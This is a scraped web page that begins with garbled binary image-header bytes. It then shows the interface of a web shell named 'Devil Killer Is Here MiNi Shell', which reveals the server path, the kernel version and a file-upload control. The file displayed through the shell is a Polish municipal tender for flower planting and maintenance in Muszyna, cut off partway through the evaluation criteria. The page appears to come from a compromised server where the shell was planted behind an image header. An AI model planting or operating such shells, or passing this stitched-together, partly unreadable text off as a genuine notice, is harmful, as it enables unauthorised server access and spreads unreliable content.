JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240130/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240130/0007853801-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Urządzenie, pielęgnacja i utrzymanie ukwiecenia na terenie Miasta i Gminy Uzdrowiskowej Muszyna w roku 2024 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miasto i Gmina Uzdrowiskowa Muszyna</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 491893061</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rynek 31</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Muszyna</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">33-370</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL218 - Nowosądecki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">184714009</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@muszyna.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.muszyna.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Urządzenie, pielęgnacja i utrzymanie ukwiecenia na terenie Miasta i Gminy Uzdrowiskowej Muszyna w roku 2024 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-83b19208-bf52-11ee-bbfa-e29e26ebc6e1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00078538</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-01-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00032419/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.9 Urządzenie, pielęgnacja i utrzymanie ukwiecenia na terenie Miasta i Gminy Uzdrowiskowej Muszyna w roku 2024</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/muszyna <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/muszyna</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Komunikacja w postępowaniu o<br/>udzielenie zamówienia w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między<br/>Zamawiającym a Wykonawcą, odbywa się przy użyciu środków komunikacji elektronicznej, tj. za pośrednictwem dedykowanego<br/>formularza dostępnego na platformie zakupowej.<br/>2.Zamawiający (w sytuacjach awaryjnych, np. w przypadku niedziałania platformy zakupowej) dopuszcza również możliwość<br/>składania dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń za pomocą poczty<br/>elektronicznej, email: przetargi@muszyna.pl.<br/>3.Sposób sporządzenia dokumentów elektronicznych oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń musi być<br/>zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu<br/>sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji<br/>elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie oraz Rozporządzeniu Ministra Rozwoju, Pracy i<br/>Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń,<br/>jakich może żądać zamawiający od wykonawcy.<br/>4.Komunikacja poprzez Wyślij wiadomość umożliwia dodanie do treści wysyłanej wiadomości plików lub spakowanego katalogu<br/>(załączników). Występuje limit objętość plików lub spakowanego katalogu w zakresie całej wiadomości do 1 GB.<br/>5.Wykonawca otrzyma powiadomienia tj. wiadomość email dotyczącą komunikatów w sytuacji gdy Zamawiający opublikuje<br/>wiadomości publiczne/komunikaty publiczne lub spersonalizowaną wiadomość zwaną wiadomością prywatną.<br/>Szczegółowy opis dot. korespondencji elektronicznej opisano o Rozdziale I, Podrozdział 12 SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Administratorem Państwa danych osobowych jest Miasto i Gmina Uzdrowiskowa<br/>Muszyna, ul. Rynek 31, 33-370 Muszyna.<br/>2. Miasto i Gmina Uzdrowiskowa Muszyna wyznaczyła Inspektora Ochrony Danych Panią Dorotę Sadowską. Kontakt z Inspektorem<br/>możliwy jest przez e-mail: rodo@muszyna.pl.<br/>3. Państwa dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o<br/>udzielenie zamówienia publicznego nr Zp.271.2.2024.<br/>4. Odbiorcami Państwa danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 18-19 ustawy.<br/>5. Państwa dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy.<br/>6. Obowiązek podania przez Państwa danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z ustawy.<br/>7. W odniesieniu do Państwa danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22<br/>RODO.<br/>8. Posiadają Państwo:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Państwa dotyczących;<br/>− na podstawie art. 16 RODO prawo do sprostowania Państwa danych osobowych ;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO ;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uznacie Państwo, że przetwarzanie danych<br/>osobowych Państwa dotyczących narusza przepisy RODO.<br/>9. Nie przysługuje Państwu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Państwa danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Informacja o ograniczeniach, o których mowa w art. 19 ust. 2 i 3 ustawy<br/>Zgodnie z art. 19 ust. 4 ustawy Zamawiający informuje o ograniczeniach, o których mowa w art. 19 ust. 2 i 3 ustawy:<br/>− Zgodnie z art. 19 ust. 3 ustawy skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia do sprostowania lub<br/>uzupełnienia, o którym mowa w art. 16 RODO, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani<br/>zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą.<br/>− Na mocy art. 19 ust. 3 ustawy wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych<br/>osobowych do czasu zakończenia tego postępowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">Zp.271.2.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest „Urządzenie, pielęgnacja i utrzymanie ukwiecenia na terenie Miasta i Gminy Uzdrowiskowej Muszyna w roku 2024”.<br/>Obsada donic, wież kwiatowych oraz gazonów - ze względu, iż donice, wieże kwiatowe oraz gazony znajdują się w reprezentacyjnych obszarach gminy, konieczne jest zwrócenie szczególnej uwagi na wysoką jakość oraz estetykę wykonanej obsady. W pierwszej kolejności w okresie wczesnowiosennym po rozmarznięciu ziemi należy wprowadzić nasadzenia z roślin odpornych na przymrozki. Rośliny te powinny zdobić donice i wieże kwiatowe do momentu wykonania nasadzeń głównych. Podejmowane zabiegi pielęgnacyjne zarówno we wczesnej fazie rozwoju roślin, jak i przez cały sezon wegetacyjny powinny zmierzać do uzyskania jak najlepszego stopnia kwitnienia. Rośliny uszkodzone, chore lub słabo rozwinięte należy zastąpić nowymi, zdrowymi i dobrze rozkrzewionymi roślinami. Bryła korzeniowa sadzonych roślin powinna być wilgotna oraz w całości okryta ziemią.<br/>Zadanie nr 1: Obsada donic, wież kwiatowych oraz gazonów<br/>Etapy prac:<br/>1)	Obsada donic wiszących, kamiennych, balkonowych oraz gazonów i wież kwiatowych - materiałem własnym Wykonawcy.<br/>2)	Całosezonowa pielęgnacja obsady donic wiszących, kamiennych, balkonowych oraz gazonów i wież kwiatowych.<br/>3)	Likwidacja wykonanej obsady donic wiszących, kamiennych, balkonowych i uprzątnięcie terenu po prowadzonych pracach. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">77300000-3 - Usługi ogrodnicze</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">77310000-6 - Usługi sadzenia roślin oraz utrzymania terenów zielonych</p> <p class="mb-0">03121100-6 - Żywe rośliny, bulwy, korzenie, sadzonki i rozsady</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-11-07</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryterium nr 1: Cena oferty (z podatkiem VAT) na którą powinny się składać wszelkie koszty ponoszone przez Wykonawcę<br/>Wzór: C = [(Cn/Cb)*60]<br/>C – łączna liczba punktów otrzymanych za kryterium cena brutto<br/>Cn – cena najniższa brutto<br/>Cb – cena wynikająca z oferty badanej brutto<br/>Maksymalną ilość punktów w obrębie kryterium otrzyma oferta z najniższą ceną.<br/><br/>Kryterium nr 2: Doświadczenie osoby, którą Wykonawca dysponuje do wykonania niniejszego zamówienia i która będzie uczestniczyła w realizacji przedmiotu zamówienia<br/><br/>Punktacja za doświadczenie osoby, którą wykonawca dysponuje do wykonania niniejszego zamówienia i która będzie uczestniczyła w realizacji przedmiotu zamówienia przyznana zostanie jeżeli osoba ta wykonała należycie zadanie polegające na: obsadzeniu donic i/lub wież kwiatowych i/lub gazonów i/lub rabat kwiatowych i/lub figur kwiatowych w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeśli okres działalności jest krótszy, to w tym okresie i że usługi te zostały wykonane należycie oraz że dedykowana osoba jest/była ich autorem.<br/><br/>Punktacja za doświadczenie w/w osoby przyznawana będzie w następujący sposób:<br/>Wykonanie 1 obsadzenia w powyższym zakresie - 10 pkt <br/>Wykonanie 2 - 3 obsadzeń w powyższym zakresie - 20 pkt <br/>Wykonanie 4 - 5 obsadzeń w powyższym zakresie - 30 pkt <br/>Wykonanie 6 i więcej obsadzeń w powyższym zakresie - 40 pkt <br/><br/>W celu otrzymania punktów w ramach niniejszego kryterium z treści dokumentów przedłożonych przez Wykonawcę musi jednoznacznie wynikać, że wykazane zadania zostały wykonane należycie i prawidłowo ukończone.<br/>Zamawiający przyzna wykonawcy 0 pkt w ramach niniejszego kryterium w następujących sytuacjach: <br/>1)	nieprzedłożenia wraz z ofertą dowodów potwierdzających że wykazane zdania zostały wykonane w okresie ostatnich 5 lat przed upływem terminu składnia ofert i/lub że zostały wykonane należycie i/lub że dedykowana osoba była ich autorem,<br/>2)	niewykazania doświadczenia osoby, którą wykonawca dysponuje do wykonania niniejszego zamówienia.<br/><br/>UWAGA: <br/>Dowody potwierdzające, że wykazane zadania zostały wykonane należycie, w terminie 5 lat przed upływem terminu składania ofert oraz, że dedykowana osoba była ich autorem muszą zostać załączone przez wykonawcę do oferty, gdyż dokumenty te nie podlegają złożeniu ani uzupełnieniu na późniejszym etapie postępowania o udzielenie zamówienia publicznego.<br/>Punktacja końcowa oferty zostanie ustalona jako suma punktów otrzymanych za wszystkie kryteria obliczona wg wzoru P=C+D<br/>P – ostateczna liczba punktów<br/>C - liczba punktów otrzymana za kryterium cena brutto<br/>D - liczba punktów otrzymana za kryterium doświadczenie osoby, którą wykonawca dysponuje do wykonania niniejszego zamówienia i która będzie uczestniczyła w realizacji przedmiotu zamówienia</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osoby, którą Wykonawca dysponuje do wykonania niniejszego zamówienia i która będzie uczestniczyła w realizacji przedmiotu zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest „Urządzenie, pielęgnacja i utrzymanie ukwiecenia na terenie Miasta i Gminy Uzdrowiskowej Muszyna w roku 2024”.<br/>Obsada rabat kwiatami – obsada rabat powinna tworzyć malowniczą kompozycję dywanową, ułożoną w formie nieregularnych, falowanych kształtów, które przenikają się nawzajem nadając wrażenie płynącej rzeki kwiatów. Zastosowane rośliny powinny mieć wyrównany pokrój, a całość powinna być utrzymywana w stanie wolnym od zachwaszczenia. Częstotliwość prac pielęgnacyjnych powinna gwarantować stałe kwitnienie oraz zdrowy estetyczny wygląd. W okresie jesiennym należy usunąć wykonane nasadzenia, przekopać i wyrównać powierzchnię rabat, a powstałą biomasę zutylizować. Prace należy prowadzić z najwyższą starannością, aby uniknąć uszkodzenia roślin cebulowych znajdujących się w glebie. W przypadku uszkodzenia cebul, konieczna jest ich wymiana na nowe. <br/>Zadanie nr 2: Obsada rabat kwiatami<br/>Etapy prac:<br/>1)	Obsada rabat kwiatami - materiałem własnym Wykonawcy.<br/>2)	Całosezonowa pielęgnacja wykonanych rabat kwiatowych.<br/>3)	Likwidacja obsady, uprzątnięcie, przekopanie i wyrównanie terenu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">77300000-3 - Usługi ogrodnicze</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">77310000-6 - Usługi sadzenia roślin oraz utrzymania terenów zielonych</p> <p class="mb-0">03121100-6 - Żywe rośliny, bulwy, korzenie, sadzonki i rozsady</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-11-07</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryterium nr 1: Cena oferty (z podatkiem VAT) na którą powinny się składać wszelkie koszty ponoszone przez Wykonawcę<br/>Wzór: C = [(Cn/Cb)*60]<br/>C – łączna liczba punktów otrzymanych za kryterium cena brutto<br/>Cn – cena najniższa brutto<br/>Cb – cena wynikająca z oferty badanej brutto<br/>Maksymalną ilość punktów w obrębie kryterium otrzyma oferta z najniższą ceną.<br/><br/>Kryterium nr 2: Doświadczenie osoby, którą Wykonawca dysponuje do wykonania niniejszego zamówienia i która będzie uczestniczyła w realizacji przedmiotu zamówienia<br/><br/>Punktacja za doświadczenie osoby, którą wykonawca dysponuje do wykonania niniejszego zamówienia i która będzie uczestniczyła w realizacji przedmiotu zamówienia przyznana zostanie jeżeli osoba ta wykonała należycie zadanie polegające na: obsadzeniu donic i/lub wież kwiatowych i/lub gazonów i/lub rabat kwiatowych i/lub figur kwiatowych w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeśli okres działalności jest krótszy, to w tym okresie i że usługi te zostały wykonane należycie oraz że dedykowana osoba jest/była ich autorem.<br/><br/>Punktacja za doświadczenie w/w osoby przyznawana będzie w następujący sposób:<br/>Wykonanie 1 obsadzenia w powyższym zakresie - 10 pkt <br/>Wykonanie 2 - 3 obsadzeń w powyższym zakresie - 20 pkt <br/>Wykonanie 4 - 5 obsadzeń w powyższym zakresie - 30 pkt <br/>Wykonanie 6 i więcej obsadzeń w powyższym zakresie - 40 pkt <br/><br/>W celu otrzymania punktów w ramach niniejszego kryterium z treści dokumentów przedłożonych przez Wykonawcę musi jednoznacznie wynikać, że wykazane zadania zostały wykonane należycie i prawidłowo ukończone.<br/>Zamawiający przyzna wykonawcy 0 pkt w ramach niniejszego kryterium w następujących sytuacjach: <br/>1)	nieprzedłożenia wraz z ofertą dowodów potwierdzających że wykazane zdania zostały wykonane w okresie ostatnich 5 lat przed upływem terminu składnia ofert i/lub że zostały wykonane należycie i/lub że dedykowana osoba była ich autorem,<br/>2)	niewykazania doświadczenia osoby, którą wykonawca dysponuje do wykonania niniejszego zamówienia.<br/><br/>UWAGA: <br/>Dowody potwierdzające, że wykazane zadania zostały wykonane należycie, w terminie 5 lat przed upływem terminu składania ofert oraz, że dedykowana osoba była ich autorem muszą zostać załączone przez wykonawcę do oferty, gdyż dokumenty te nie podlegają złożeniu ani uzupełnieniu na późniejszym etapie postępowania o udzielenie zamówienia publicznego.<br/>Punktacja końcowa oferty zostanie ustalona jako suma punktów otrzymanych za wszystkie kryteria obliczona wg wzoru P=C+D<br/>P – ostateczna liczba punktów<br/>C - liczba punktów otrzymana za kryterium cena brutto<br/>D - liczba punktów otrzymana za kryterium doświadczenie osoby, którą wykonawca dysponuje do wykonania niniejszego zamówienia i która będzie uczestniczyła w realizacji przedmiotu zamówienia</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, 